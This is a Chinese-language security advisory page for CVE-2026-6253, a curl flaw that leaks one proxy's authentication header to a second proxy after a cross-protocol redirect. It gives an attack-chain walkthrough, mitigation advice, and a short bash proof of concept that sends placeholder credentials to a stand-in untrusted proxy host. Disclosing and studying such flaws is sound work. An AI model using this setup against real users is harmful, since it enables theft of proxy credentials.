CVE-2026-6253 CVSS 5.9 中危

CVE-2026-6253 curl代理凭证泄露漏洞

披露日期: 2026-05-13

来源: 2499f714-1537-4658-8207-48ae4bb9eae9

漏洞信息

漏洞编号

CVE-2026-6253

漏洞类型

凭证泄露

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

curl

漏洞概述

curl在特定配置下存在安全漏洞，可能导致代理认证凭证泄露。当curl被配置为针对不同的URL协议使用不同的代理服务器，且第一个代理需要认证而第二个代理不需要认证时，如果curl在通过第一个代理访问时被重定向到使用第二个协议（及第二个代理）的URL，它可能会错误地将第一个代理的认证凭证传递给第二个代理。这会将敏感的认证信息暴露给未预期的第三方代理服务器。

技术细节

该漏洞的核心在于curl处理跨协议重定向时的代理认证状态管理逻辑错误。漏洞触发的四个必要条件是：1. curl针对不同协议（如http和https）配置了不同的代理；2. 第一个代理配置了认证信息；3. 第二个代理未配置认证；4. 在使用第一个代理过程中，服务器返回了重定向响应，导致curl切换协议并使用第二个代理进行连接。在正常情况下，切换代理时应清除或重新评估认证信息，但受影响的curl版本未能正确执行此操作，导致本应仅限于第一个代理的Authorization头部（如Proxy-Authorization）被错误地附加到了发往第二个代理的HTTP请求中。由于第二个代理可能由不可信方控制，这直接导致了凭证的泄露。

攻击链分析

STEP 1

1. 配置环境

攻击者诱导受害者配置curl，为HTTP协议设置需要认证的代理A，为HTTPS协议设置无需认证的代理B。

STEP 2

2. 发起请求

受害者使用curl请求一个HTTP URL，该请求通过代理A进行。

STEP 3

3. 触发重定向

HTTP服务器（或代理A）返回一个3xx重定向响应，将目标地址指向一个HTTPS URL。

STEP 4

4. 切换代理

curl自动跟随重定向，检测到协议变更，从而切换连接到代理B以访问HTTPS资源。

STEP 5

5. 凭证泄露

由于漏洞，curl在向代理B发送请求时，错误地携带了本属于代理A的认证头。代理B（可能由攻击者控制）记录下这些凭证。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash # PoC for CVE-2026-6253 # Description: Demonstrates credential leakage to a second proxy during redirect. # Configuration # Proxy A: Requires authentication (user:pass) # Proxy B: Does not require authentication # Set environment variables for proxies export http_proxy="http://user:[email protected]:8080" export https_proxy="http://proxy-b.untrusted.com:8443" # Target URL that redirects from http to https # The server at http://target.com should return 302 to https://target.com echo "Sending request..." # The curl command follows the redirect (-L) # Vulnerable versions will send 'Proxy-Authorization: Basic ...' header to proxy-b.untrusted.com curl -v -L http://target.com/redirect echo "Check proxy-b logs for leaked credentials."

影响范围

curl (具体受影响版本未在提供文本中明确列出，请参考官方通告)

防御指南

临时缓解措施

建议用户尽快检查并更新curl客户端至最新版本。在未更新前，应避免使用`-L`（跟随重定向）选项访问不可信URL，或者确保所有配置的代理服务器具有同等的安全信任级别，防止凭证在代理间意外泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6253
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6253
3 Details https://www.cvedetails.com/cve/CVE-2026-6253/
4 VulDB https://vuldb.com/cve/CVE-2026-6253
5 Link https://curl.se/docs/CVE-2026-6253.html
6 Link https://curl.se/docs/CVE-2026-6253.json
7 Link https://hackerone.com/reports/3669637
8 Link http://www.openwall.com/lists/oss-security/2026/04/29/11
9 Link https://hackerone.com/reports/3669637

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表